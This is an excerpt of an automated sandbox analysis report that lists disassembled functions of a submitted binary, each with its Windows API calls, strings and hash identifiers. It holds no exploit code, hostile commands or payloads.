                                                  • SafeArrayDestroyDescriptor.OLEAUT32(?), ref: 00C46CF9
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.1290109289.0000000000BF1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00BF0000, based on PE: true
                                                  • Associated: 00000005.00000002.1290075298.0000000000BF0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.1295627778.0000000000C7F000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.1295627778.0000000000CA4000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.1295798374.0000000000CAE000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.1296093581.0000000000CB7000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_bf0000_25Lz840Dmh.jbxd
                                                  Similarity
                                                  • API ID: ArraySafe$DataVariant$DescriptorDestroy$AllocClear$AccessCopyInitUnaccess
                                                  • String ID:
                                                  • API String ID: 2706829360-0
                                                  • Opcode ID: 4e0ad3fd084416aaf4536fc48d6d4405164942f01ba4c0b1ee1fab2b7fab60e8
                                                  • Instruction ID: 57f11c621b854444c76ec7312c31fea34f5687b91a06abefde3e3545c20b8d33
                                                  • Opcode Fuzzy Hash: 4e0ad3fd084416aaf4536fc48d6d4405164942f01ba4c0b1ee1fab2b7fab60e8
                                                  • Instruction Fuzzy Hash: 5A414575A001199FCF14DF64D888AAEBBB9FF09354F008079E955E7261CB30E946DF91
                                                  Function 00C683BB Relevance: 15.9, APIs: 6, Strings: 3, Instructions: 197comCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                    • Part of subcall function 00BF9837: __itow.LIBCMT ref: 00BF9862
                                                    • Part of subcall function 00BF9837: __swprintf.LIBCMT ref: 00BF98AC
                                                  • CoInitialize.OLE32 ref: 00C68403
                                                  • CoUninitialize.OLE32 ref: 00C6840E
                                                  • CoCreateInstance.OLE32(?,00000000,00000017,00C82BEC,?), ref: 00C6846E
                                                  • IIDFromString.OLE32(?,?), ref: 00C684E1
                                                  • VariantInit.OLEAUT32(?), ref: 00C6857B
                                                  • VariantClear.OLEAUT32(?), ref: 00C685DC
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.1290109289.0000000000BF1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00BF0000, based on PE: true
                                                  • Associated: 00000005.00000002.1290075298.0000000000BF0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.1295627778.0000000000C7F000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.1295627778.0000000000CA4000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.1295798374.0000000000CAE000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.1296093581.0000000000CB7000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_bf0000_25Lz840Dmh.jbxd
                                                  Similarity
                                                  • API ID: Variant$ClearCreateFromInitInitializeInstanceStringUninitialize__itow__swprintf
                                                  • String ID: Failed to create object$Invalid parameter$NULL Pointer assignment
                                                  • API String ID: 834269672-1287834457
                                                  • Opcode ID: 9789a43a60ed314dc609388627ce971ab840698e36ab8285b5fa169218c64bdd
                                                  • Instruction ID: 28354fea9c6bf97f2f01480b8889c82e0c4238b2c61d6c789e31152b9db5b965
                                                  • Opcode Fuzzy Hash: 9789a43a60ed314dc609388627ce971ab840698e36ab8285b5fa169218c64bdd
                                                  • Instruction Fuzzy Hash: 40618D706083129FD720DF55C888F6EB7E8AF49754F004659F9969B291CB70EE88CB92
                                                  Function 00C65732 Relevance: 15.9, APIs: 8, Strings: 1, Instructions: 163networkfileCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • WSAStartup.WSOCK32(00000101,?), ref: 00C65793
                                                  • inet_addr.WSOCK32(?,?,?), ref: 00C657D8
                                                  • gethostbyname.WSOCK32(?), ref: 00C657E4
                                                  • IcmpCreateFile.IPHLPAPI ref: 00C657F2
                                                  • IcmpSendEcho.IPHLPAPI(?,?,?,00000005,00000000,?,00000029,00000FA0), ref: 00C65862
                                                  • IcmpSendEcho.IPHLPAPI(00000000,00000000,?,00000005,00000000,?,00000029,00000FA0), ref: 00C65878
                                                  • IcmpCloseHandle.IPHLPAPI(00000000), ref: 00C658ED
                                                  • WSACleanup.WSOCK32 ref: 00C658F3
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.1290109289.0000000000BF1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00BF0000, based on PE: true
                                                  • Associated: 00000005.00000002.1290075298.0000000000BF0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.1295627778.0000000000C7F000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.1295627778.0000000000CA4000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.1295798374.0000000000CAE000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.1296093581.0000000000CB7000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_bf0000_25Lz840Dmh.jbxd
                                                  Similarity
                                                  • API ID: Icmp$EchoSend$CleanupCloseCreateFileHandleStartupgethostbynameinet_addr
                                                  • String ID: Ping
                                                  • API String ID: 1028309954-2246546115
                                                  • Opcode ID: 80b22d96516d207903a59f93f334e125cc468c02f0f7af1939754ebc96940e73
                                                  • Instruction ID: b3dbe6beb3a2d161a1ca4e9ae69476495799a4fde7c580190d50b40f44c6a1d3
                                                  • Opcode Fuzzy Hash: 80b22d96516d207903a59f93f334e125cc468c02f0f7af1939754ebc96940e73
                                                  • Instruction Fuzzy Hash: E4519E316447009FD720DF25CC85B2A77E4EF49720F144569FA6ADB2E1DB30E945DB42
                                                  Function 00C5B4C3 Relevance: 15.8, APIs: 4, Strings: 5, Instructions: 98COMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • SetErrorMode.KERNEL32(00000001), ref: 00C5B4D0
                                                  • GetDiskFreeSpaceW.KERNEL32(?,?,?,?,?,00000002,00000001), ref: 00C5B546
                                                  • GetLastError.KERNEL32 ref: 00C5B550
                                                  • SetErrorMode.KERNEL32(00000000,READY), ref: 00C5B5BD
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.1290109289.0000000000BF1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00BF0000, based on PE: true
                                                  • Associated: 00000005.00000002.1290075298.0000000000BF0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.1295627778.0000000000C7F000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.1295627778.0000000000CA4000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.1295798374.0000000000CAE000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.1296093581.0000000000CB7000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_bf0000_25Lz840Dmh.jbxd
                                                  Similarity
                                                  • API ID: Error$Mode$DiskFreeLastSpace
                                                  • String ID: INVALID$NOTREADY$READONLY$READY$UNKNOWN
                                                  • API String ID: 4194297153-14809454
                                                  • Opcode ID: 259cfd74a16f12a6232d5c659068c54908c29b2d2699e64ea3949f8e7a7cead2
                                                  • Instruction ID: 09990f7bba60ed9abdf2f742c49b1472fd015e6e2326352ea82b1c6d40562d8d
                                                  • Opcode Fuzzy Hash: 259cfd74a16f12a6232d5c659068c54908c29b2d2699e64ea3949f8e7a7cead2
                                                  • Instruction Fuzzy Hash: 7F318339A002099FCB04DBA8DC85FBD7BB4FF05316F504165FA1597292EB709E8ACB51
                                                  Function 00C48F8F Relevance: 15.8, APIs: 7, Strings: 2, Instructions: 82windowCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                    • Part of subcall function 00BF7DE1: _memmove.LIBCMT ref: 00BF7E22
                                                    • Part of subcall function 00C4AA99: GetClassNameW.USER32(?,?,000000FF), ref: 00C4AABC
                                                  • SendMessageW.USER32(?,0000018C,000000FF,00000002), ref: 00C49014
                                                  • GetDlgCtrlID.USER32 ref: 00C4901F
                                                  • GetParent.USER32 ref: 00C4903B
                                                  • SendMessageW.USER32(00000000,?,00000111,?), ref: 00C4903E
                                                  • GetDlgCtrlID.USER32(?), ref: 00C49047
                                                  • GetParent.USER32(?), ref: 00C49063
                                                  • SendMessageW.USER32(00000000,?,?,00000111), ref: 00C49066
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.1290109289.0000000000BF1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00BF0000, based on PE: true
                                                  • Associated: 00000005.00000002.1290075298.0000000000BF0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.1295627778.0000000000C7F000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.1295627778.0000000000CA4000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.1295798374.0000000000CAE000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.1296093581.0000000000CB7000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_bf0000_25Lz840Dmh.jbxd
                                                  Similarity
                                                  • API ID: MessageSend$CtrlParent$ClassName_memmove
                                                  • String ID: ComboBox$ListBox
                                                  • API String ID: 1536045017-1403004172
                                                  • Opcode ID: 8534c7a1580e0990304a285964aeb7649eed1471eee8836dfca1561abd14cc46
                                                  • Instruction ID: d3957de742b17356bfff874a4bbf991c4c9b1aac8558d75353b3a54339240308
                                                  • Opcode Fuzzy Hash: 8534c7a1580e0990304a285964aeb7649eed1471eee8836dfca1561abd14cc46
                                                  • Instruction Fuzzy Hash: 9C21D074A00108BFDF04ABA5CC85FFEBBB8FF49310F1041A9BA21972E1DB755959DA20
                                                  Function 00C4907A Relevance: 15.8, APIs: 7, Strings: 2, Instructions: 81windowCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                    • Part of subcall function 00BF7DE1: _memmove.LIBCMT ref: 00BF7E22
                                                    • Part of subcall function 00C4AA99: GetClassNameW.USER32(?,?,000000FF), ref: 00C4AABC
                                                  • SendMessageW.USER32(?,00000186,00000002,00000000), ref: 00C490FD
                                                  • GetDlgCtrlID.USER32 ref: 00C49108
                                                  • GetParent.USER32 ref: 00C49124
                                                  • SendMessageW.USER32(00000000,?,00000111,?), ref: 00C49127
                                                  • GetDlgCtrlID.USER32(?), ref: 00C49130
                                                  • GetParent.USER32(?), ref: 00C4914C
                                                  • SendMessageW.USER32(00000000,?,?,00000111), ref: 00C4914F
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.1290109289.0000000000BF1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00BF0000, based on PE: true
                                                  • Associated: 00000005.00000002.1290075298.0000000000BF0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.1295627778.0000000000C7F000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.1295627778.0000000000CA4000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.1295798374.0000000000CAE000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.1296093581.0000000000CB7000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_bf0000_25Lz840Dmh.jbxd
                                                  Similarity
                                                  • API ID: MessageSend$CtrlParent$ClassName_memmove
                                                  • String ID: ComboBox$ListBox
                                                  • API String ID: 1536045017-1403004172
                                                  • Opcode ID: db6568c28b3e8d374b19c74e41691d301a14ee820e11338ce5c5f151b4ce45de
                                                  • Instruction ID: 84be92ebd39596748aa4348b94a39a46ebe0de38604c1671f3a7318e525f81c2
                                                  • Opcode Fuzzy Hash: db6568c28b3e8d374b19c74e41691d301a14ee820e11338ce5c5f151b4ce45de
                                                  • Instruction Fuzzy Hash: 6B21F574A40108BFDF10ABA5CC85FFEBBB8FF49310F004069BA25972A1DB754959DB20
                                                  Function 00C49163 Relevance: 15.8, APIs: 4, Strings: 5, Instructions: 72windowCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • GetParent.USER32 ref: 00C4916F
                                                  • GetClassNameW.USER32(00000000,?,00000100), ref: 00C49184
                                                  • _wcscmp.LIBCMT ref: 00C49196
                                                  • SendMessageW.USER32(00000000,00000111,0000702B,00000000), ref: 00C49211
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.1290109289.0000000000BF1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00BF0000, based on PE: true
                                                  • Associated: 00000005.00000002.1290075298.0000000000BF0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.1295627778.0000000000C7F000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.1295627778.0000000000CA4000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.1295798374.0000000000CAE000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.1296093581.0000000000CB7000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_bf0000_25Lz840Dmh.jbxd
                                                  Similarity
                                                  • API ID: ClassMessageNameParentSend_wcscmp
                                                  • String ID: SHELLDLL_DefView$details$largeicons$list$smallicons
                                                  • API String ID: 1704125052-3381328864
                                                  • Opcode ID: fb486b6a5bb4f75284964b2de76a9b70140d5007d23a4ce5b4ce71e79a250509
                                                  • Instruction ID: f4873bb993920cc32fa56e88d160c98779ea368a7ae22ff23f2903bed0079349
                                                  • Opcode Fuzzy Hash: fb486b6a5bb4f75284964b2de76a9b70140d5007d23a4ce5b4ce71e79a250509
                                                  • Instruction Fuzzy Hash: 75110D3A24831779FB312625DC0BEE737ACFF16724B200126F920A44D1FEB259A16554
                                                  Function 00C688AB Relevance: 15.3, APIs: 10, Instructions: 324fileCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • VariantInit.OLEAUT32(?), ref: 00C688D7
                                                  • CoInitialize.OLE32(00000000), ref: 00C68904
                                                  • CoUninitialize.OLE32 ref: 00C6890E
                                                  • GetRunningObjectTable.OLE32(00000000,?), ref: 00C68A0E
                                                  • SetErrorMode.KERNEL32(00000001,00000029), ref: 00C68B3B
                                                  • CoGetInstanceFromFile.OLE32(00000000,?,00000000,00000015,00000002,?,00000001,00C82C0C), ref: 00C68B6F
                                                  • CoGetObject.OLE32(?,00000000,00C82C0C,?), ref: 00C68B92
                                                  • SetErrorMode.KERNEL32(00000000), ref: 00C68BA5
                                                  • SetErrorMode.KERNEL32(00000000,00000000,00000000,00000000,00000000), ref: 00C68C25
                                                  • VariantClear.OLEAUT32(?), ref: 00C68C35
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.1290109289.0000000000BF1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00BF0000, based on PE: true
                                                  • Associated: 00000005.00000002.1290075298.0000000000BF0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.1295627778.0000000000C7F000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.1295627778.0000000000CA4000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.1295798374.0000000000CAE000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.1296093581.0000000000CB7000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_bf0000_25Lz840Dmh.jbxd
                                                  Similarity
                                                  • API ID: ErrorMode$ObjectVariant$ClearFileFromInitInitializeInstanceRunningTableUninitialize
                                                  • String ID:
                                                  • API String ID: 2395222682-0
                                                  • Opcode ID: e4b690017544eb878a70f90ee4a07a2a7772120abc8772c1d672158a2045652d
                                                  • Instruction ID: c25d658fda85db0f27e70d0caaf4ad60c9544ad8a1888d012bce957ef8287a4b
                                                  • Opcode Fuzzy Hash: e4b690017544eb878a70f90ee4a07a2a7772120abc8772c1d672158a2045652d
                                                  • Instruction Fuzzy Hash: E6C127B1208305AFD710DF64C884A2BB7E9FF89348F00495DF9999B251DB71ED4ACB52
                                                  Function 00C57990 Relevance: 15.3, APIs: 10, Instructions: 292COMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • SafeArrayGetVartype.OLEAUT32(00000000,?), ref: 00C57A6C
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.1290109289.0000000000BF1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00BF0000, based on PE: true
                                                  • Associated: 00000005.00000002.1290075298.0000000000BF0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.1295627778.0000000000C7F000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.1295627778.0000000000CA4000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.1295798374.0000000000CAE000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.1296093581.0000000000CB7000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_bf0000_25Lz840Dmh.jbxd
                                                  Similarity
                                                  • API ID: ArraySafeVartype
                                                  • String ID:
                                                  • API String ID: 1725837607-0
                                                  • Opcode ID: ad3e98088935d889e8e1e9939088d29ff4fba3d79d13b91ed3679d10a0580f0c
                                                  • Instruction ID: b6dfb1801383d98e28b512cfd2f0a74a319b8dd2be162a47fbe1b0546091ae99
                                                  • Opcode Fuzzy Hash: ad3e98088935d889e8e1e9939088d29ff4fba3d79d13b91ed3679d10a0580f0c
                                                  • Instruction Fuzzy Hash: 78B19E799042199FDB00DFA5E884BBEB7B4FF09322F204169E911E7241D734E9C9DBA4
                                                  Function 00C511CE Relevance: 15.1, APIs: 10, Instructions: 89threadCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • GetCurrentThreadId.KERNEL32 ref: 00C511F0
                                                  • GetForegroundWindow.USER32(00000000,?,?,?,?,?,00C50268,?,00000001), ref: 00C51204
                                                  • GetWindowThreadProcessId.USER32(00000000), ref: 00C5120B
                                                  • AttachThreadInput.USER32(00000000,00000000,00000001,?,?,?,?,?,00C50268,?,00000001), ref: 00C5121A
                                                  • GetWindowThreadProcessId.USER32(?,00000000), ref: 00C5122C
                                                  • AttachThreadInput.USER32(00000000,00000000,00000001,?,?,?,?,?,00C50268,?,00000001), ref: 00C51245
                                                  • AttachThreadInput.USER32(00000000,00000000,00000001,?,?,?,?,?,00C50268,?,00000001), ref: 00C51257
                                                  • AttachThreadInput.USER32(00000000,00000000,?,?,?,?,?,00C50268,?,00000001), ref: 00C5129C
                                                  • AttachThreadInput.USER32(00000000,00000000,00000000,?,?,?,?,?,00C50268,?,00000001), ref: 00C512B1
                                                  • AttachThreadInput.USER32(00000000,00000000,00000000,?,?,?,?,?,00C50268,?,00000001), ref: 00C512BC
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.1290109289.0000000000BF1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00BF0000, based on PE: true
                                                  • Associated: 00000005.00000002.1290075298.0000000000BF0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.1295627778.0000000000C7F000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.1295627778.0000000000CA4000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.1295798374.0000000000CAE000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.1296093581.0000000000CB7000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_bf0000_25Lz840Dmh.jbxd
                                                  Similarity
                                                  • API ID: Thread$AttachInput$Window$Process$CurrentForeground
                                                  • String ID:
                                                  • API String ID: 2156557900-0
                                                  • Opcode ID: ea569301740fa39765d7eeef685fc52c046b1a7802dff56c000badb114bc9f61
                                                  • Instruction ID: d159a576f67de21f5b8ca19a06abe21f3c7594ba296df75265d72ef2b71e2675
                                                  • Opcode Fuzzy Hash: ea569301740fa39765d7eeef685fc52c046b1a7802dff56c000badb114bc9f61
                                                  • Instruction Fuzzy Hash: 6B319E79A00204FBDB109F94EC88F7D77ADEB54312F144229FD14C61A0D7B89EC48B64
                                                  Function 00BFFA5D Relevance: 14.3, APIs: 7, Strings: 1, Instructions: 264comCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • mciSendStringW.WINMM(close all,00000000,00000000,00000000), ref: 00BFFAA6
                                                  • OleUninitialize.OLE32(?,00000000), ref: 00BFFB45
                                                  • UnregisterHotKey.USER32(?), ref: 00BFFC9C
                                                  • DestroyWindow.USER32(?), ref: 00C345D6
                                                  • FreeLibrary.KERNEL32(?), ref: 00C3463B
                                                  • VirtualFree.KERNEL32(?,00000000,00008000), ref: 00C34668
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.1290109289.0000000000BF1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00BF0000, based on PE: true
                                                  • Associated: 00000005.00000002.1290075298.0000000000BF0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.1295627778.0000000000C7F000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.1295627778.0000000000CA4000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.1295798374.0000000000CAE000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.1296093581.0000000000CB7000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_bf0000_25Lz840Dmh.jbxd
                                                  Similarity
                                                  • API ID: Free$DestroyLibrarySendStringUninitializeUnregisterVirtualWindow
                                                  • String ID: close all
                                                  • API String ID: 469580280-3243417748
                                                  • Opcode ID: 3e87775056b9cab4682ec8a71f7bb9657d0142b07c1f8e987ad6775273bac749
                                                  • Instruction ID: 1521347488811c9b26038cb112bb28457b6df2a9924ca44956b9b38220904413
                                                  • Opcode Fuzzy Hash: 3e87775056b9cab4682ec8a71f7bb9657d0142b07c1f8e987ad6775273bac749
                                                  • Instruction Fuzzy Hash: 8EA15C30711216CFDB29EF14C995A79F3A4EF05710F1442EDEA0AAB262DB30AD5ADF50
                                                  Function 00C4A068 Relevance: 14.2, APIs: 2, Strings: 6, Instructions: 241COMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • EnumChildWindows.USER32(?,00C4A439), ref: 00C4A377
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.1290109289.0000000000BF1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00BF0000, based on PE: true
                                                  • Associated: 00000005.00000002.1290075298.0000000000BF0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.1295627778.0000000000C7F000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.1295627778.0000000000CA4000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.1295798374.0000000000CAE000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.1296093581.0000000000CB7000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_bf0000_25Lz840Dmh.jbxd
                                                  Similarity
                                                  • API ID: ChildEnumWindows
                                                  • String ID: CLASS$CLASSNN$INSTANCE$NAME$REGEXPCLASS$TEXT
                                                  • API String ID: 3555792229-1603158881
                                                  • Opcode ID: 05cd2efeeb7d810f038aa6d005080f70ea09c1b83558c7b532d6d949d76d82df
                                                  • Instruction ID: 66c7aeb4f2de5f6bfb555c2aaecc2f187fea9f9479d2efd212a68a910cdfcf20
                                                  • Opcode Fuzzy Hash: 05cd2efeeb7d810f038aa6d005080f70ea09c1b83558c7b532d6d949d76d82df
                                                  • Instruction Fuzzy Hash: 8F91E531640606EBCB18DFB0C842BEEFBB4BF05304F508159E85DA7151DF70AA99EB91
                                                  Function 00BF2E26 Relevance: 14.2, APIs: 7, Strings: 1, Instructions: 186windowCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • SetWindowLongW.USER32(?,000000EB), ref: 00BF2EAE
                                                    • Part of subcall function 00BF1DB3: GetClientRect.USER32(?,?), ref: 00BF1DDC
                                                    • Part of subcall function 00BF1DB3: GetWindowRect.USER32(?,?), ref: 00BF1E1D
                                                    • Part of subcall function 00BF1DB3: ScreenToClient.USER32(?,?), ref: 00BF1E45
                                                  • GetDC.USER32 ref: 00C2CD32
                                                  • SendMessageW.USER32(?,00000031,00000000,00000000), ref: 00C2CD45
                                                  • SelectObject.GDI32(00000000,00000000), ref: 00C2CD53
                                                  • SelectObject.GDI32(00000000,00000000), ref: 00C2CD68
                                                  • ReleaseDC.USER32(?,00000000), ref: 00C2CD70
                                                  • MoveWindow.USER32(?,?,?,?,?,?,?,00000031,00000000,00000000), ref: 00C2CDFB
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.1290109289.0000000000BF1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00BF0000, based on PE: true
                                                  • Associated: 00000005.00000002.1290075298.0000000000BF0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.1295627778.0000000000C7F000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.1295627778.0000000000CA4000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.1295798374.0000000000CAE000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.1296093581.0000000000CB7000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_bf0000_25Lz840Dmh.jbxd
                                                  Similarity
                                                  • API ID: Window$ClientObjectRectSelect$LongMessageMoveReleaseScreenSend
                                                  • String ID: U
                                                  • API String ID: 4009187628-3372436214
                                                  • Opcode ID: 5e15f2f10a6dcb3e3d945fa75fd4140ef675d23b86e6403ddd7de9fa99747f15
                                                  • Instruction ID: 333a64598268409e5d154404e9726bb8023415e8d5637a4221e2633edd46953f
                                                  • Opcode Fuzzy Hash: 5e15f2f10a6dcb3e3d945fa75fd4140ef675d23b86e6403ddd7de9fa99747f15
                                                  • Instruction Fuzzy Hash: FB719F31500209DFCF218F64D8C4BBE7BB5FF48350F24426AEE695B2A6C7318985DB60
                                                  Function 00C61A15 Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 134networkCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • InternetConnectW.WININET(?,?,?,?,?,?,00000000,00000000), ref: 00C61A50
                                                  • HttpOpenRequestW.WININET(00000000,00000000,?,00000000,00000000,00000000,?,00000000), ref: 00C61A7C
                                                  • InternetQueryOptionW.WININET(00000000,0000001F,00000000,?), ref: 00C61ABE
                                                  • InternetSetOptionW.WININET(00000000,0000001F,00000100,00000004), ref: 00C61AD3
                                                  • HttpSendRequestW.WININET(00000000,00000000,00000000,00000000,00000000), ref: 00C61AE0
                                                  • HttpQueryInfoW.WININET(00000000,00000005,?,?,00000000), ref: 00C61B10
                                                  • InternetCloseHandle.WININET(00000000), ref: 00C61B57
                                                    • Part of subcall function 00C62483: GetLastError.KERNEL32(?,?,00C61817,00000000,00000000,00000001), ref: 00C62498
                                                    • Part of subcall function 00C62483: SetEvent.KERNEL32(?,?,00C61817,00000000,00000000,00000001), ref: 00C624AD
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.1290109289.0000000000BF1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00BF0000, based on PE: true
                                                  • Associated: 00000005.00000002.1290075298.0000000000BF0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.1295627778.0000000000C7F000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.1295627778.0000000000CA4000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.1295798374.0000000000CAE000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.1296093581.0000000000CB7000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_bf0000_25Lz840Dmh.jbxd
                                                  Similarity
                                                  • API ID: Internet$Http$OptionQueryRequest$CloseConnectErrorEventHandleInfoLastOpenSend
                                                  • String ID:
                                                  • API String ID: 2603140658-3916222277
